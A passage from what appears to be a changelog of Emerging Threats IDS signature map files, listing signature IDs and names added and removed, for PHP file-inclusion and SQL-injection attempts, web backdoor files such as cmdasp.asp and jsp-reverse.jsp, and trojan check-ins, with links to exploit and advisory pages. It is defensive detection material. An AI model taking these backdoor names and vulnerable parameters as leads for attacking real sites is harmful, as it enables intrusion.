        2009348 || ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan || url,www.sophos.com/blogs/gc/g/2009/05/07/worldpay-card-transactions-carry-malware-danger/

     -> Added to emerging-sid-msg.map.txt (60):
        2001621 || ET WEB Exploit Suspected PHP Injection Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001621 || cve,2002-0953
        2001716 || ET WEB_SPECIFIC IDN url seen.. || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_IDN || url,doc.emergingthreats.net/2001716
        2001810 || ET WEB Explit PHP remote file include exploit attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001810
        2002838 || ET WEB_SPECIFIC Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html
        2002849 || ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509
        2003520 || ET WEB EXPLOIT webCalendar Remote File include || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_WebCalendar || url,doc.emergingthreats.net/2003520 || url,www.securityfocus.com/archive/1/462957
        2007611 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007611
        2007612 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007612
        2007613 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007613
        2007614 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007614
        2007950 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and Nome do Computador in Body || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007950
        2008142 || ET TROJAN Vapsup User-Agent (doshowmeanad loader v2.1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Vapsup || url,doc.emergingthreats.net/2008142
        2008278 || ET TROJAN Generic Raider Obfuscated VBScript || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Raider_Obfuscated_VBS || url,doc.emergingthreats.net/2008278 || url,bbs.duba.net/viewthread.php?tid=21892104&page=1&extra=page=1
        2008379 || ET TROJAN Swizzor Checkin (kgen_up) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Lop || url,doc.emergingthreats.net/2008379
        2008973 || ET TROJAN onmuz.com Infection Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Onmuz.com || url,doc.emergingthreats.net/2008973
        2009126 || ET TROJAN Possible bot C&C Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009126
        2009156 || ET TROJAN Unknown Dropper Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Droppers_General || url,doc.emergingthreats.net/2009156 || url,www.virustotal.com/analisis/a4a854e56ecc0a54204fc3b043c63094
        2009306 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009306 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009307 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009307 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009308 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009308 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009309 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009309 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009310 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009310 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009311 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009311 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009312 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009312 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009313 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009313 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009314 || ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Orbit || url,doc.emergingthreats.net/2009314 || url,milw0rm.com/exploits/8257 || bugtraq,34200
        2009315 || ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PrecisionID || url,doc.emergingthreats.net/2009315 || url,securityfocus.com/archive/1/502319 || url,milw0rm.com/exploits/8332
        2009316 || ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_YapBB || url,doc.emergingthreats.net/2009316 || bugtraq,30686
        2009317 || ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DesktopOnNet || url,doc.emergingthreats.net/2009317 || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009318 || ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DesktopOnNet || url,doc.emergingthreats.net/2009318 || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009319 || ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DeZine || url,doc.emergingthreats.net/2009319 || url,milw0rm.com/exploits/7722 || bugtraq,33194
        2009320 || ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_rgboard || url,doc.emergingthreats.net/2009320 || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009321 || ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_rgboard || url,doc.emergingthreats.net/2009321 || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009322 || ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_SupportSoft || url,doc.emergingthreats.net/2009322 || url,milw0rm.com/exploits/8160 || bugtraq,34004
        2009323 || ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Demium || url,doc.emergingthreats.net/2009323 || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009324 || ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Demium || url,doc.emergingthreats.net/2009324 || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009325 || ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009325 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009326 || ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009326 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009327 || ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009327 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009328 || ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Geovision || url,doc.emergingthreats.net/2009328 || url,milw0rm.com/exploits/8206 || bugtraq,34115
        2009329 || ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Zabbix || url,doc.emergingthreats.net/2009329 || bugtraq,33965 || url,milw0rm.com/exploits/8140 || url,secunia.com/advisories/34091/
        2009330 || ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_MyForum || url,doc.emergingthreats.net/2009330 || url,milw0rm.com/exploits/6846 || url,vupen.com/english/advisories/2008/2938
        2009331 || ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_tinyCMS || url,doc.emergingthreats.net/2009331 || bugtraq,30785 || url,milw0rm.com/exploits/6287
        2009332 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ODARS || url,doc.emergingthreats.net/2009332 || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009333 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ODARS || url,doc.emergingthreats.net/2009333 || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009334 || ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Monrovia_Barcode || url,doc.emergingthreats.net/2009334 || bugtraq,23934 || url,milw0rm.com/exploits/8208
        2009335 || ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_NicLOR || url,doc.emergingthreats.net/2009335 || url,xforce.iss.net/xforce/xfdb/46330 || url,milw0rm.com/exploits/6982 || bugtraq,32112
        2009336 || ET WEB Possible Web Backdoor cfexec.cfm access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009336 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009337 || ET WEB Possible Web Backdoor cmdasp.asp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009337 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009338 || ET WEB Possible Web Backdoor cmdasp.aspx access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009338 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009339 || ET WEB Possible Web Backdoor simple-backdoor.php access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009339 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009340 || ET WEB Possible Web Backdoor php-backdoor.php access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009340 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009341 || ET WEB Possible Web Backdoor jsp-reverse.jsp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009341 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009342 || ET WEB Possible Web Backdoor perlcmd.cgi access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009342 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009343 || ET WEB Possible Web Backdoor cmdjsp.jsp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009343 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009344 || ET WEB Possible Web Backdoor cmd-asp-5.1.asp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009344 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009345 || ET ATTACK-RESPONSE HTTP 401 Unauthorized || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized || url,doc.emergingthreats.net/2009345
        2009346 || ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized || url,doc.emergingthreats.net/2009346
        2009347 || ET TROJAN Tigger.a/Syzor Checkin
        2009348 || ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan || url,www.sophos.com/blogs/gc/g/2009/05/07/worldpay-card-transactions-carry-malware-danger/

     -> Added to emerging.rules (1):
        #by Veerendra at secpod.com

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (71):
        2001621 || ET Exploit Suspected PHP Injection Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001621 || cve,2002-0953
        2001716 || ET Web IDN url seen.. || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_IDN || url,doc.emergingthreats.net/2001716
        2001810 || ET EXPLOIT WEB PHP remote file include exploit attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001810
        2002838 || ET Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html
        2002849 || ET WEB-MISC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509
        2003520 || ET EXPLOIT webCalendar Remote File include || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_WebCalendar || url,doc.emergingthreats.net/2003520 || url,www.securityfocus.com/archive/1/462957
        2007611 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007611
        2007612 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007612
        2007613 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007613
        2007614 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007614
        2007950 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and Nome do Computador in Body || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007950
        2008142 || ET MALWARE Vapsup User-Agent (doshowmeanad loader v2.1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Vapsup || url,doc.emergingthreats.net/2008142
        2008278 || ET MALWARE Generic Raider Obfuscated VBScript || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Raider_Obfuscated_VBS || url,doc.emergingthreats.net/2008278 || url,bbs.duba.net/viewthread.php?tid=21892104&page=1&extra=page=1
        2008379 || ET MALWARE Swizzor Checkin (kgen_up) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Lop || url,doc.emergingthreats.net/2008379
        2008505 || ET MALWARE Adaware.BarACE Checkin and Update || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_BarAce || url,doc.emergingthreats.net/2008505 || url,www.symantec.com/security_response/writeup.jsp?docid=2007-021714-2431-99&tabid=2
        2008973 || ET MALWARE onmuz.com Infection Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Onmuz.com || url,doc.emergingthreats.net/2008973
        2009126 || ET Malware Possible bot C&C Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009126
        2009156 || ET MALWARE Unknown Dropper Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Droppers_General || url,doc.emergingthreats.net/2009156 || url,www.virustotal.com/analisis/a4a854e56ecc0a54204fc3b043c63094
        2009306 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009307 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009308 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009309 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009310 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009311 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009312 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009313 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009314 || ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete || url,milw0rm.com/exploits/8257 || bugtraq,34200
        2009315 || ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite || url,securityfocus.com/archive/1/502319 || url,milw0rm.com/exploits/8332
        2009316 || ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion || bugtraq,30686
        2009317 || ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009318 || ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009319 || ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection || url,milw0rm.com/exploits/7722 || bugtraq,33194
        2009320 || ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009321 || ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009322 || ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution || url,milw0rm.com/exploits/8160 || bugtraq,34004
        2009323 || ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009324 || ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009325 || ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009326 || ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009327 || ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009328 || ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution || url,milw0rm.com/exploits/8206 || bugtraq,34115
        2009329 || ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion || bugtraq,33965 || url,milw0rm.com/exploits/8140 || url,secunia.com/advisories/34091/
        2009330 || ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion || url,milw0rm.com/exploits/6846 || url,vupen.com/english/advisories/2008/2938
        2009331 || ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion || bugtraq,30785 || url,milw0rm.com/exploits/6287
        2009332 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009333 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009334 || ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite || bugtraq,23934 || url,milw0rm.com/exploits/8208
        2009335 || ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection || url,xforce.iss.net/xforce/xfdb/46330 || url,milw0rm.com/exploits/6982 || bugtraq,32112
        2009336 || ET WEB Possible Web Backdoor cfexec.cfm access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009337 || ET WEB Possible Web Backdoor cmdasp.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009338 || ET WEB Possible Web Backdoor cmdasp.aspx access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009339 || ET WEB Possible Web Backdoor simple-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009340 || ET WEB Possible Web Backdoor php-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009341 || ET WEB Possible Web Backdoor jsp-reverse.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009342 || ET WEB Possible Web Backdoor perlcmd.cgi access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009343 || ET WEB Possible Web Backdoor cmdjsp.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009344 || ET WEB Possible Web Backdoor cmd-asp-5.1.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009345 || ET ATTACK-RESPONSE HTTP 401 Unauthorized
        2009346 || ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack
        2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (71):
        2001621 || ET Exploit Suspected PHP Injection Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001621 || cve,2002-0953
        2001716 || ET Web IDN url seen.. || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_IDN || url,doc.emergingthreats.net/2001716
        2001810 || ET EXPLOIT WEB PHP remote file include exploit attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001810
        2002838 || ET Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html
